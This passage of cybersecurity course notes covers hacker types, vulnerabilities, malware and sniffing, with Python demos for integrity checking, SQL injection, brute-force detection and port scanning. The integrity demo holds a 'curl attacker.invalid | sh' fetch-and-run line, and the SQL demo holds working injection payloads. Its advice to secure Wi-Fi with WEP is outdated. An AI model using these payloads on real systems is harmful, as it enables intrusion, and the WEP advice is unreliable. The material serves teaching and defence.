understanding of the hacking process.

Motives & Aims: One standard script kiddie attack is a DoS (Denial of Service) or DDoS
(Distributed Denial of Service) attack, in which a target address is flooded with so much
traffic that the service collapses, much as a shopping website can be overwhelmed on Black
Friday. The attack creates confusion and prevents legitimate users from using the service.

5) Green Hat Hackers

Green hat hackers are types of hackers who learn the ropes of hacking. They are slightly
different from the Script Kiddies due to their intention. The intent is to strive and learn to
become full-fledged hackers. They are looking for opportunities to learn from experienced
hackers.

6) Blue Hat Hackers

Blue Hat Hackers are types of hackers who’re similar to Script Kiddies. The intent to learn is
missing. They use hacking as a weapon to gain popularity among their fellow beings. They use
hacking to settle scores with their adversaries. Blue Hat Hackers are dangerous due to the intent
behind the hacking rather than their knowledge.

7) Red Hat Hackers

Red hat hackers, sometimes called eagle-eyed hackers, are similar to white hat hackers in that
they intend to stop the attacks of black hat hackers. The difference lies in their methods rather
than their intention: red hat hackers are ruthless when dealing with black hats or counteracting
malware, and may attack the attacker's own systems aggressively, to the point where the black
hat's infrastructure has to be rebuilt from scratch.

Above are 7 types of hackers broadly referred to in the cybersecurity world.

The three types of hackers listed below work in different capacities.

8) State/Nation Sponsored Hackers

Governments employ hackers to gather information about other countries. These are known as
state or nation-sponsored hackers. They use their skills to obtain confidential information from
other countries so that their own country is prepared for any upcoming threat. Such intelligence
helps the state stay on top of every situation and avert danger. They report only to their
governments.

9) Hacktivist

These hackers target government and corporate websites and present themselves as activists,
hence the name hacktivist. A hacktivist can be an individual or a group of anonymous hackers
whose intent is to gain access to government websites and networks. Data obtained from the
compromised systems is used to further a political or social cause, typically by leaking it or
by defacing sites.

10) Malicious insider or Whistleblower

This category covers individuals working inside an organization who expose or misuse its
confidential information. The motive may be a personal grudge against the organization, which
makes the person a malicious insider, or the individual may have come across illegal activities
within the organization and disclosed them, which makes the person a whistleblower. The reason
for the exposure defines the intent behind it, and the two cases should be treated differently.

Crackers
We have learnt about hackers, how they work, what their interests are and what they do. When we
talk of crackers, we should note that crackers are also hackers in the technical sense, but their
ways of working differ a lot. While a hacker works in the interest of a company or an individual,
a cracker works in the opposite manner. The purpose of a cracker is to break the security of
computers and networks, which is an illegal activity. Crackers use their knowledge for personal
gain and to breach security across networks. They acquire extensive knowledge of computers,
programming, software, and languages and use it to break into computers for criminal gains.

The crackers are also known as Black Hats. They gain access to the accounts of people
maliciously, and they can misuse the secured information across networks. They can steal credit
card information; they can destroy important files, disclose crucial data and information or
personal details and sell them for personal gains. Their purpose can range from little personal
gains to bigger criminal interests. They can make employees of a company divulge highly secure
information. They violate computer security. Once they have gained control over a system, they
can do anything like steal data, destroy it, use it to their advantage etc.

What interests these Crackers?


While some crackers are driven by sheer publicity of their abilities in the field of hacking,
some do it for criminal and malicious purposes. They intentionally breach the computer and
network security merely for profit, or maybe there is a challenge in it. They are interested in
gaining access to various programs and software without paying royalties. The only purpose they
have is illegal hacking leading to security problems. There may be theft from credit card holders’
accounts, important data may be lost, and secure information may be divulged. Some crackers
are interested in modifying the software by reverse engineering. And they do this merely for
amusement or to showcase their knowledge and abilities.

Types of Crackers
There are various types of crackers, including script kiddies, packet monkeys, s'kiddiots,
lamers, warez d00dz (dudes), and wannabes. Usually they are less skilled and lack in-depth
knowledge of programming and code. They almost always rely on software tools created by others
to carry out their operations, and most of the time they do not know what the program really
does. They know only the procedure for cracking a network's security and lack advanced
knowledge. They are not much of a threat individually, but their threats cannot be ignored; they
typically deface web pages and replace them with their own designs.

Hackers vs Crackers
There is a common view that hackers build things and crackers break things. The two terms may
seem similar, but there are differences in how the two actually work. While hackers have advanced
knowledge of computer security, crackers are usually not as skilful. Very few of them are able to
create their own software and tools, so they generally rely on disreputable websites to download
automated programs that carry out their deeds for them. Hackers try to counter the threats that
crackers pose to computer and internet security across networks. Crackers know that their
activities are illegal and that they are breaking the law, so they tend to cover their tracks.

Professional hackers, being competent and skilful, can restore security across compromised
networks and help in catching the crackers responsible. Although most crackers are less skilled,
some are highly capable: they possess advanced skills and extensive knowledge, just like
professional hackers, and can write their own tools and software to exploit the weak points they
discover in well-secured programs. Such crackers are hard to catch because they leave little
trail behind. Their number is small, but they should not be ignored, since they pose a serious
threat to internet security.

By now we are aware that hackers, in this usage, are the ethical professionals, while crackers
break into security systems unethically and illegally. Besides this ethical difference, one of
the major differences between the two is their understanding of computer and security systems,
and in particular their ability or inability to create programs and software tools. Hackers can
write code in multiple languages, such as C, C++, HTML, Java and others, and have a complete
understanding of what that code does and how the software works. Crackers, on the other hand,
are often inept when it comes to programming; they boast about their ability to break into
security systems and use them to their advantage. The difference is clear: crackers break into
secure networks for malicious purposes while a professional hacker does not, and it is how they
work that makes them entirely different from each other.

Cybersecurity Vulnerabilities: Types, Examples, and more


The importance of cybersecurity in sustaining business operations has increased significantly as
the value of data increases every day. Organizations must successfully prevent employee and
customer data breaches if they want to develop new business connections and sustain long-term
relationships. A thorough awareness of cybersecurity vulnerabilities and the techniques used by
threat actors to access networks is necessary to achieve this level of security.

Effective vulnerability management not only improves security programmes but also lessens the
impact of successful attacks. For enterprises across industries, having a well-established
vulnerability management system is now a must. The most typical categories of cybersecurity
vulnerabilities are described below, along with methods to manage vulnerabilities on your
systems.
What are Cyber Security Vulnerabilities?

Any flaw in an organization's internal controls, system procedures, or information systems is a
vulnerability in cyber security. Cybercriminals and hackers look for these weak points and use
them as entry points to exploit the system.

Through them, attackers can enter networks without authorization and seriously harm data
privacy. Data is a gold mine in the modern world and has to be protected carefully. As a result,
it is crucial to check constantly for cybersecurity vulnerabilities, because a single flaw in a
network could lead to a complete compromise of an organization's systems.

Examples of Cyber Security Vulnerabilities

Here are a few examples of cybersecurity vulnerabilities:

• Missing data encryption
• Lack of security cameras
• Unlocked doors at businesses
• Unrestricted upload of dangerous files
• Code downloads without integrity checks
• Use of broken cryptographic algorithms
• URL redirection to untrustworthy websites
• Weak and unchanged passwords
• Website without SSL/TLS (served over plain HTTP)
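The item "code downloads without integrity checks" is one that a few lines of code can close. The following is an added example, not code from these notes or from any vendor, showing how to verify a downloaded file against a SHA-256 digest the vendor published out of band before the file is executed. The package contents and the published digest are constructed here for the demo; the real setting assumed is that the digest comes from a channel separate from the download mirror (for example the vendor's HTTPS page, or better, a signed manifest), because a digest served next to the file by the same compromised mirror proves nothing.

```python
import hashlib
import hmac
import os
import tempfile

# Constructed sample: pretend this is an installer script we downloaded, and
# that PUBLISHED_SHA256 is the digest the vendor published over a trusted
# channel. (The digest is computed here only so the demo is self-contained.)
GENUINE_PACKAGE = b"#!/bin/sh\necho 'installing example tool'\n"
PUBLISHED_SHA256 = hashlib.sha256(GENUINE_PACKAGE).hexdigest()


def sha256_bytes(data: bytes) -> str:
    """Hex SHA-256 of an in-memory blob."""
    return hashlib.sha256(data).hexdigest()


def sha256_file(path: str, chunk_size: int = 64 * 1024) -> str:
    """Stream a file through SHA-256 so a large download need not fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def verify_download(path: str, expected_sha256: str) -> bool:
    """True only if the file's digest equals the published one.

    hmac.compare_digest runs in constant time, so the comparison does not leak
    how many leading characters of the digest already matched."""
    actual = sha256_file(path)
    return hmac.compare_digest(actual.lower(), expected_sha256.strip().lower())


def install_if_verified(path: str, expected_sha256: str) -> str:
    """Gate for the 'run what we downloaded' step: refuse on any mismatch."""
    if not verify_download(path, expected_sha256):
        raise RuntimeError("integrity check failed; refusing to execute downloaded code")
    return "verified"  # a real installer would unpack or execute the file here


def run_demo() -> dict:
    """Write a genuine and a tampered copy to temp files and check both."""
    tampered = GENUINE_PACKAGE.replace(b"echo", b"curl attacker.invalid | sh; echo")
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        for name, body in (("genuine", GENUINE_PACKAGE), ("tampered", tampered)):
            path = os.path.join(tmp, name + ".sh")
            with open(path, "wb") as fh:
                fh.write(body)
            results[name] = verify_download(path, PUBLISHED_SHA256)
    return results


if __name__ == "__main__":
    print(run_demo())  # {'genuine': True, 'tampered': False}
```

A digest check protects against a corrupted or swapped file; it does not tell you the vendor is who you think it is. Where the vendor offers a signature (GPG, Sigstore, Authenticode), verify that instead and let the digest check be the fallback.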
Vulnerability Vs. Cyber Security Attacks

A vulnerability is a fault or weakness in the system itself, much like a structural defect in a
building: it is present whether or not anyone attacks it, and it is usually introduced by
network or operating system configuration errors or by programming mistakes rather than by an
act of cybercrime. An attack, on the other hand, is the act of using such a weakness; attackers
enter a system through social engineering, malware downloads, or direct exploitation of the
flaw.

Risk is the combination of the likelihood that a vulnerability will be used against you and the
consequences if it is. If both factors are low, the risk is low. Since risk rises with both, a
vulnerability with high probability and high impact produces a high risk.

Cyber Security Vulnerability Becoming Exploitable

An exploitable vulnerability has at least one specific attack vector. For obvious reasons,
attackers seek out exploitable points in a system or network. Nobody wants to have a weakness at
all, but a weakness that someone could actually exploit should concern you the most.

There are instances where a vulnerability is not (yet) exploitable. The causes can be:

1. Insufficient public knowledge for attackers to exploit it.
2. The attacker lacks a prerequisite, such as access to the local system or prior
authentication.
3. Existing security controls block the attack path.
Causes of Cyber Security Vulnerabilities

There are many causes of cyber security vulnerabilities. A few of them are as follows:
• Complexity: The likelihood of errors, defects, or unauthorized access increases with
complex systems.
• Familiarity: Attackers may already be acquainted with common code, operating systems,
hardware, and software, which results in well-known vulnerabilities.
• Connectivity: Vulnerabilities are more likely to be reachable on connected devices. It is
better to avoid connecting devices to networks unnecessarily.
• Poor Password Management: Weak or reused passwords cause many data breaches. It is
important to use strong, unique passwords (a password manager or generator helps) and to
change them whenever they may have been exposed.
• Internet: Spyware and adware that can be loaded onto computers automatically are abundant
on the internet.
• Operating System Flaws: Operating systems can also be flawed. Operating systems that are
not safe by default may give users unrestricted access and serve as a haven for malware and
viruses.
• Software Bugs: Programmers may unintentionally introduce a vulnerability that can be
exploited.
• Unchecked User Input: If software or a website assumes that all user input is safe, an
attacker can supply crafted input, for example a string that the database interprets as
SQL, and carry out a SQL injection.
• People: For most organizations, social engineering poses the biggest concern. Therefore, one
of the main sources of vulnerability is people.
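The "unchecked user input" cause above is easiest to see with a query written both ways. The following is an added example (not code from these notes) using Python's built-in sqlite3 module: a lookup that splices the username into the SQL text, beside the parameterised version of the same query, run against a constructed in-memory table whose password hashes are placeholders.

```python
import sqlite3

# Constructed demo table (in-memory SQLite). The hashes are placeholders only.
SEED_ROWS = [
    ("alice", "$2b$12$aliceplaceholderhash", "admin"),
    ("bob", "$2b$12$bobplaceholderhash", "user"),
]


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password_hash TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SEED_ROWS)
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, username: str):
    """Trusts the input and splices it straight into the SQL text.
    A single quote in `username` closes the string literal and everything
    after it is parsed as SQL, so the caller controls the query."""
    sql = f"SELECT username, role FROM users WHERE username = '{username}'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn: sqlite3.Connection, username: str):
    """Parameterised query: the value is bound as data and never parsed as
    SQL, so quotes and keywords in the input have no special meaning."""
    sql = "SELECT username, role FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


# Two classic payloads: the first makes the WHERE clause always true, the
# second uses UNION to read a column the query was never meant to expose.
TAUTOLOGY = "' OR '1'='1"
UNION_DUMP = "x' UNION SELECT password_hash, role FROM users --"

if __name__ == "__main__":
    db = make_db()
    print(lookup_vulnerable(db, TAUTOLOGY))   # every user returned
    print(lookup_vulnerable(db, UNION_DUMP))  # password hashes leaked
    print(lookup_safe(db, TAUTOLOGY))         # [] : treated as a literal username
```

The safe version works because the database driver sends the SQL and the value separately; no amount of quoting in the value changes the query structure. Escaping or filtering quotes by hand is not a substitute, since encodings and second-order inputs routinely get past such filters.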
Types of Cyber Security Vulnerabilities

Here are a few common types of cybersecurity vulnerabilities:

System Misconfigurations

System misconfigurations are network assets whose security settings are inconsistent, insecure,
or simply left at unsafe defaults. Cybercriminals frequently scan networks for such errors and
vulnerable spots that they can exploit. Misconfigurations are increasing as a result of rapid
digital transformation, so working with knowledgeable security professionals is crucial when
implementing new technology.

Out-of-date or Unpatched Software

Just as they look for configuration errors, hackers frequently scour networks for unpatched
systems, which are prime targets. Attackers may use these unpatched vulnerabilities to steal
confidential data, which is a huge threat to any organization. Establishing a patch management
strategy that ensures the most recent updates are applied as soon as they are issued is crucial
for reducing these threats.

Missing or Weak Authorization Credentials

Attackers frequently use brute force methods, such as guessing employee passwords, to gain
access to systems and networks. Organizations must therefore train employees in cybersecurity
best practices so that their login credentials cannot be exploited easily, and should enforce
strong passwords and multi-factor authentication. Endpoint security software on every laptop
and desktop is a useful addition.
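Password guessing leaves a very recognisable trace in authentication logs, and spotting it is a standard detection task. The following is an added example (not code from these notes) that runs a sliding-window rule over constructed sshd log lines in the usual syslog layout: a burst of failed logins from one source address raises an alert, and a later successful login from the same address escalates it, since that pattern suggests the guessing worked. The year is assumed to be 2024 because syslog timestamps omit it; the addresses are from the RFC 5737 documentation ranges.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sshd lines; nothing here comes from a real system.
SAMPLE_LOG = """\
Mar 10 08:00:01 bastion sshd[2101]: Failed password for invalid user admin from 203.0.113.5 port 51234 ssh2
Mar 10 08:00:03 bastion sshd[2102]: Failed password for invalid user test from 203.0.113.5 port 51236 ssh2
Mar 10 08:00:04 bastion sshd[2103]: Failed password for root from 203.0.113.5 port 51238 ssh2
Mar 10 08:00:06 bastion sshd[2104]: Failed password for root from 203.0.113.5 port 51240 ssh2
Mar 10 08:00:07 bastion sshd[2105]: Failed password for alice from 192.0.2.9 port 40010 ssh2
Mar 10 08:00:09 bastion sshd[2106]: Failed password for root from 203.0.113.5 port 51242 ssh2
Mar 10 08:00:11 bastion sshd[2107]: Failed password for root from 203.0.113.5 port 51244 ssh2
Mar 10 08:00:15 bastion sshd[2108]: Accepted publickey for alice from 192.0.2.9 port 40012 ssh2
Mar 10 08:00:20 bastion sshd[2109]: Accepted password for root from 203.0.113.5 port 51246 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?:password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+"
)


def parse_line(line: str, year: int = 2024):
    """Return (timestamp, result, user, ip), or None for lines we ignore.
    syslog omits the year, so the caller supplies one (assumed 2024 here)."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["ip"]


def detect_bruteforce(log_text: str, threshold: int = 5, window_seconds: int = 60) -> dict:
    """`threshold` failures from one source IP within `window_seconds` raises a
    medium alert; a later Accepted from the same IP escalates it to high."""
    recent = defaultdict(deque)   # ip -> failure timestamps still inside the window
    targets = defaultdict(set)    # ip -> account names it has tried
    alerts = {}
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, result, user, ip = parsed
        if result == "Failed":
            targets[ip].add(user)
            window = recent[ip]
            window.append(ts)
            while window and (ts - window[0]).total_seconds() > window_seconds:
                window.popleft()   # drop failures that fell out of the window
            if len(window) >= threshold:
                alert = alerts.setdefault(ip, {"severity": "medium", "first_seen": window[0]})
                alert.update(failures=len(window), last_seen=ts, accounts=sorted(targets[ip]))
        elif result == "Accepted" and ip in alerts:
            alerts[ip]["severity"] = "high"   # guessing may have succeeded
            alerts[ip]["login_as"] = user
    return alerts


if __name__ == "__main__":
    for ip, alert in detect_bruteforce(SAMPLE_LOG).items():
        print(ip, alert)
```

The threshold and window are the tuning knobs: too low and password-typo storms from one office NAT address page the on-call engineer; too high and a slow, distributed guess (one attempt per address per minute) never trips the rule, which is why a per-account variant of the same logic is usually run alongside it.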
Malicious Insider Threats

Employees with access to vital systems may, knowingly or unknowingly, share data that enables
hackers to infiltrate the network. Because all their actions appear legitimate, insider threats
can be hard to identify. To counter these risks, consider network access control tools and
segment your network so that each role can reach only the systems it needs (least privilege),
with activity on sensitive segments logged and reviewed.

Missing or Poor Data Encryption

If a network uses weak or no encryption, it is simpler for attackers to intercept system
communications and compromise them. When data travels or is stored without adequate encryption,
adversaries can harvest sensitive information and tamper with data before it reaches the server.
This may result in fines from regulators and jeopardize an organization's efforts to comply with
cyber security regulations.

Zero-day Vulnerabilities

Zero-day vulnerabilities are software flaws that attackers are aware of but that the vendor and
its users have not yet identified, so the vendor has had zero days to fix them.

Because the flaw has not been identified or reported to the manufacturer, there is no patch and
usually no workaround. Zero-days are particularly risky because there is no specific protection
against them before an attack occurs. Defence in depth, prompt patching once a fix appears, and
monitoring for anomalous behaviour are the practical ways to reduce the risk of zero-day attacks.

Vulnerability Management

The process of identifying, classifying, resolving, and mitigating security vulnerabilities is
known as vulnerability management. Vulnerability management consists of three key
components:

1. Vulnerability detection
2. Vulnerability assessment
3. Addressing Vulnerabilities
Vulnerability Detection

The process of vulnerability detection has the following three methods:

• Vulnerability scanning
• Penetration testing
• Google hacking
Cyber Security Vulnerability Scan

A vulnerability scan is performed to discover vulnerabilities in computers, programs, or
networks. A scanner (software) is used to find and pinpoint weaknesses resulting from improper
configuration and poor programming, typically by probing hosts for open services and comparing
what it finds against a database of known flaws.
SolarWinds Network Configuration Manager (NCM), ManageEngine Vulnerability Manager Plus,
Rapid7 Nexpose, Tripwire IP360, and others are common vulnerability detection solutions.
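The first thing every scanner in that list does is find out which services a host exposes. The following is an added example (not code from these notes or from any of those products) of that first stage: a concurrent TCP connect scan with a banner grab and a crude service fingerprint. So that it runs offline, the block starts its own throwaway listener on 127.0.0.1 with a made-up banner; the port number is whatever the OS assigns. A real scanner goes on to match the version string against a vulnerability database, which is out of scope here.

```python
import socket
import threading
from concurrent.futures import ThreadPoolExecutor

# Hypothetical banner for the demo listener; constructed, not from a real host.
DEMO_BANNER = b"SSH-2.0-OpenSSH_demo\r\n"


def start_dummy_service(banner: bytes = DEMO_BANNER) -> int:
    """Start a throwaway TCP listener on 127.0.0.1 that greets each client
    with `banner` and hangs up. Returns the OS-chosen port so the scan below
    has something to find without touching any real network."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))
    srv.listen(8)
    port = srv.getsockname()[1]

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            with conn:
                conn.sendall(banner)

    threading.Thread(target=serve, daemon=True).start()
    return port


def probe(host: str, port: int, timeout: float):
    """TCP connect scan of one port plus a banner grab.
    Returns (port, banner) when open, (port, None) when closed or filtered."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.settimeout(timeout)
            try:
                banner = s.recv(256).decode("ascii", errors="replace").strip()
            except socket.timeout:
                banner = ""   # open, but the service waits for the client to speak
            return port, banner
    except OSError:
        return port, None


def scan_ports(host: str, ports, timeout: float = 0.5, workers: int = 32) -> dict:
    """Scan many ports concurrently; returns {open_port: banner_text}."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = list(pool.map(lambda p: probe(host, p, timeout), ports))
    return {port: banner for port, banner in results if banner is not None}


def classify(banner: str) -> str:
    """Crude service fingerprint from the greeting line."""
    if banner.startswith("SSH-"):
        return "ssh"
    if banner.startswith("HTTP/"):
        return "http"
    if banner.startswith("220"):
        return "smtp-or-ftp"
    return "unknown"


def unused_port() -> int:
    """Pick a port that is (almost certainly) closed, for the demo."""
    with socket.socket() as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


if __name__ == "__main__":
    open_port = start_dummy_service()
    found = scan_ports("127.0.0.1", [open_port, unused_port()])
    for port, banner in found.items():
        print(port, classify(banner), banner)
```

Only scan hosts you are authorised to scan; a connect scan completes the TCP handshake and is logged by the target, so it is also exactly the behaviour a detection rule like the brute-force one earlier would flag from the other side.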

Penetration Testing

Testing an IT asset for security flaws that an attacker might be able to exploit is known as
penetration testing or pen testing. Manual or automated penetration testing is available.
Additionally, it can evaluate adherence to compliance standards, staff security knowledge,
security policies, and the capacity to recognize and address security events.

Google Hacking

Google hacking is using a search engine to identify security flaws. Google hacking is
accomplished by using complex search operators in queries that can find difficult information or
data that has unintentionally been made public due to cloud service misconfiguration. These
focused queries are typically used to find sensitive data not meant for public exposure.

Vulnerability Assessment

A cybersecurity vulnerability assessment is the next step after identifying vulnerabilities: it
determines the danger each one poses to your organization. Using vulnerability assessments, you
can prioritize remediation activities by assigning risk levels to the detected flaws. Effective
assessments also support compliance efforts by ensuring that vulnerabilities are fixed before
attackers can use them against the organization.

Addressing Vulnerabilities

Once a vulnerability’s risk level has been determined, you then need to treat the vulnerability.
There are different ways in which you can treat a vulnerability. These include:

• Remediation
Remediation means the vulnerability is completely fixed, usually by applying a patch or
changing the configuration. Since it removes the risk rather than reducing it, this is the
preferred way of treating vulnerabilities.

• Mitigation
To mitigate a vulnerability, one takes action to make it less likely to be exploited, for
example by restricting access to the affected service. Mitigation is usually done to buy time
until a suitable patch is released.

• Acceptance
When an organization determines that a vulnerability carries minimal risk, it is acceptable to
take no action to resolve it. Acceptance is also reasonable when fixing the vulnerability would
cost more than the expected loss if it were exploited. Recording such a decision, with the
reasoning, is what is meant by acceptance.
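The assessment and treatment steps above are a procedure, and it helps to see it carried through end to end. The following is an added example (not code from these notes) that scores constructed findings by likelihood times impact, ranks them, and picks remediate, mitigate or accept using the rules given: remediate when a fix exists, mitigate when it does not, accept when the risk is low or the fix costs more than the expected loss. The risk bands and the mapping from a 1..5 likelihood rating to a yearly exploit probability are assumptions for the demo, not a standard table; a real programme would substitute its own calibration.

```python
from dataclasses import dataclass
from typing import List, Tuple


@dataclass
class Finding:
    name: str
    likelihood: int           # 1 (rare) .. 5 (almost certain) to be exploited
    impact: int               # 1 (negligible) .. 5 (severe) consequence if it is
    patch_available: bool     # a vendor fix or configuration change exists today
    fix_cost: float           # estimated cost to remediate
    loss_if_exploited: float  # estimated loss from one successful exploit


# Assumed calibration of the 1..5 likelihood rating to a yearly probability.
EXPLOIT_PROBABILITY = {1: 0.05, 2: 0.15, 3: 0.35, 4: 0.60, 5: 0.90}


def risk_score(f: Finding) -> int:
    """Likelihood x impact, the 'probability and impact' rule above (1..25)."""
    return f.likelihood * f.impact


def risk_level(score: int) -> str:
    """Bands for a 5x5 matrix; thresholds are an assumption for the demo."""
    if score >= 15:
        return "critical"
    if score >= 9:
        return "high"
    if score >= 4:
        return "medium"
    return "low"


def expected_loss(f: Finding) -> float:
    """Annualised loss expectancy: probability of exploit x loss per event."""
    return EXPLOIT_PROBABILITY[f.likelihood] * f.loss_if_exploited


def choose_treatment(f: Finding) -> str:
    """Remediate / mitigate / accept, following the three treatments above.
    Critical findings are never accepted on cost grounds alone."""
    level = risk_level(risk_score(f))
    if level == "low":
        return "accept"
    if level != "critical" and f.fix_cost > expected_loss(f):
        return "accept"       # the fix costs more than the loss it prevents
    if f.patch_available:
        return "remediate"
    return "mitigate"         # buy time until a patch exists


def prioritise(findings: List[Finding]) -> List[Tuple[str, str, str]]:
    """Highest risk first, ties broken by expected loss: (name, level, treatment)."""
    ranked = sorted(findings, key=lambda f: (risk_score(f), expected_loss(f)), reverse=True)
    return [(f.name, risk_level(risk_score(f)), choose_treatment(f)) for f in ranked]


# Constructed findings for the demo (not from any real assessment).
SAMPLE_FINDINGS = [
    Finding("unpatched VPN appliance RCE", 5, 5, True, 2_000, 500_000),
    Finding("SQL injection in customer portal", 4, 4, False, 5_000, 200_000),
    Finding("legacy report server", 3, 3, True, 50_000, 20_000),
    Finding("internal wiki without TLS", 2, 2, True, 500, 5_000),
    Finding("verbose banner on test server", 2, 1, True, 100, 1_000),
]

if __name__ == "__main__":
    for name, level, treatment in prioritise(SAMPLE_FINDINGS):
        print(f"{level:9} {treatment:10} {name}")
```

Note that "legacy report server" comes out as accept despite a high rating, purely because the fix is far more expensive than the expected loss; in practice a decision like that needs a named risk owner's sign-off and a review date, which is the part of acceptance that the arithmetic cannot supply.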
Malware
Malware is malicious software that gives the attacker full or limited control over the target system. Malware can damage, modify, and/or steal information from the system. There are various types of malware such as viruses, Trojans, worms, rootkits, spyware, and ransomware. Malware might enter the system through emails, file transfers, installation of random third-party software, and failure to use quality antivirus software.

What is a Malware Attack?

A malware attack is a cyberattack in which malware performs or executes unauthorized actions on a user's system. Even criminal organizations, state actors, and well-known businesses have been accused of or caught deploying malware. If the impact of a malware attack is severe, it ends up being mainstream news just like other cyberattacks.

Types of Malware
There are several types of malware. Let us take a look at them.

Malware Virus

A virus is malware that requires human intervention to run and spread. The following are the different types of viruses:

• File Viruses: These viruses are infected executable files that infect other files
when opened.
• Macro Viruses: These viruses are Excel files that have malware written in VBS;
when such files are opened, a macro gets executed and infects other files.
• Master Boot Record Viruses: These viruses change or delete boot records that
can render a system useless.
• Polymorphic Viruses: These viruses are able to evade detection by changing
their form frequently.
• Stealth Viruses: These viruses hide in other legitimate files or services.

Trojan Malware

A Trojan is malware that conceals itself in other legitimate files. When the files and software that are bundled with the malware get installed, the malware is installed and executed along with them. The following are the various types of Trojans:

• Remote Access Trojans: These Trojans allow hackers to gain remote access to
systems through covert channels without the knowledge of the user.
• Data Sending Trojans: These Trojans steal data from systems and transmit it to
the attacker.
• Destructive Trojans: As the name suggests, these Trojans destroy files and
services.
• Security Software Disabler Trojans: These Trojans can disable system
firewalls and antiviruses to prevent detection of other malicious files being
downloaded and executed.

Worm Malware

Worms are similar to viruses but without the need for human intervention to run and
propagate.

Rootkit Malware

Rootkits are extremely difficult to detect and almost impossible to remove unless the system is formatted.

Malware Examples
Malware has a long history that dates back to infected floppy disks swapped by Apple
II hobbyists in the 1980s and the Morris Worm that infected Unix machines in 1988.
Some other examples of high-profile malware attacks are:

• SQL Slammer that brought internet traffic to a halt within minutes of release in
2003
• Zeus, a keylogger Trojan that targeted banking information
• CryptoLocker’s code kept getting repurposed for malware projects of similar
caliber and was the first example of a widespread ransomware attack
• Stuxnet infected systems all over the world but only did real damage to the
uranium-enrichment centrifuges at Natanz, the Iranian nuclear facility

Malware Detection
The following signs indicate that a system or network may be infected with malware. These are the signs that you need to look for:

1. Extremely slow and unresponsive system
2. Undeletable files
3. Random folders or shortcuts inside folders
4. Issues while shutting down due to certain running files or programs
5. Change in default settings of the PC
6. Unnecessary running services or programs using up the processing power of the CPU
7. Reboot issues
8. Automatic shutdown
9. Unusual traffic patterns or traffic to destinations you never contacted
10. Similar malware alerts from the antivirus across the network

Sniffing

What Are Sniffing Attacks, and How Can They Be Prevented?

The technique of capturing all data packets traveling through a network using a software
application or hardware device is known as network sniffing (Mitchell, 2021). Ethical hackers
can use sniffing to gain tremendous insights into the workings of a network and the behavior of
its users, which can be used to improve an organization’s cybersecurity.
However, when employed by malicious hackers, sniffing can be used to launch devastating
attacks against unsuspecting targets. This article will look at what sniffing is, how it can be used
for harm, and how sniffing attacks can be prevented.

What Is Sniffing?
In its simplest form, sniffing is the act of intercepting and monitoring traffic on a network. This
can be done using software that captures all data packets passing through a given network
interface or by using hardware devices explicitly designed for this purpose.

What Are Sniffing Attacks?
A sniffing attack occurs when an attacker uses a packet sniffer to intercept and read sensitive
data passing through a network (Biasco, 2021). Common targets for these attacks include
unencrypted email messages, login credentials, and financial information.
In some cases, attackers may also use sniffing attack tools and packet sniffers to inject malicious
code into otherwise innocuous data packets in an attempt to hijack a target’s computer or other
devices.

How Do Hackers Intercept Packets?
There are several ways an attacker can capture packets passing through a network. One popular
method is to set up a packet sniffer on a computer connected to the network in question. This
computer acts as a proxy between the targeted devices and the rest of the world, allowing the
attacker to capture all traffic passing through.
Another common technique is ARP poisoning, in which the attacker tricks devices on the
network into thinking they are communicating with another device when they are not
(Grimmick, 2021). This allows the attacker to intercept and read all traffic passing between the
two “devices.”

Types of Sniffing Attacks
There are two primary sniffing attack types: passive and active.

Passive Sniffing
In a passive sniffing attack, the hacker monitors traffic passing through a network without
interfering in any way. This type of attack can be beneficial for gathering information about
targets on a network and the types of data (e.g., login credentials, email messages) they are
transmitting. Because it does not involve any interference with the target systems, it is also less
likely to raise suspicion than other types of attacks.

Active Sniffing
Active sniffing is a type of attack that involves sending crafted packets to one or more targets on
a network to extract sensitive data. By using specially crafted packets, attackers can often bypass
security measures that would otherwise protect data from being intercepted. Active sniffing can
also involve injecting malicious code into target systems that allows attackers to take control of
them or steal sensitive information.

Consequences of a Sniffing Attack
A successful sniffing attack can have several severe consequences for the targets. These can
include:
• Loss of sensitive data, such as login credentials, financial information, and email messages
• Injection of malicious code into target systems, allowing attackers to control devices or access sensitive
information
• Interruption of network traffic, which can cause communication problems and slow down network performance
• Exposure of confidential information, such as trade secrets and proprietary data
• Damage to the reputation of the organization whose network has been compromised

How Can Sniffing Attacks Be Prevented?
There are many ways to protect your network against sniffing attacks. Some key measures
include:
• Using encryption to protect sensitive data from being intercepted
• Never sending sensitive information over an unencrypted connection
• Ensuring that all computers on a network are adequately protected with antivirus and firewall software
• Making sure the wireless network is secured using WPA or WEP encryption
• Regularly updating all software and devices with the latest security patches
• Staying aware of what type of traffic passes through the network and taking steps to protect sensitive
information
• Using a VPN when connecting to public Wi-Fi networks
• Continuously monitoring the network for unusual activity
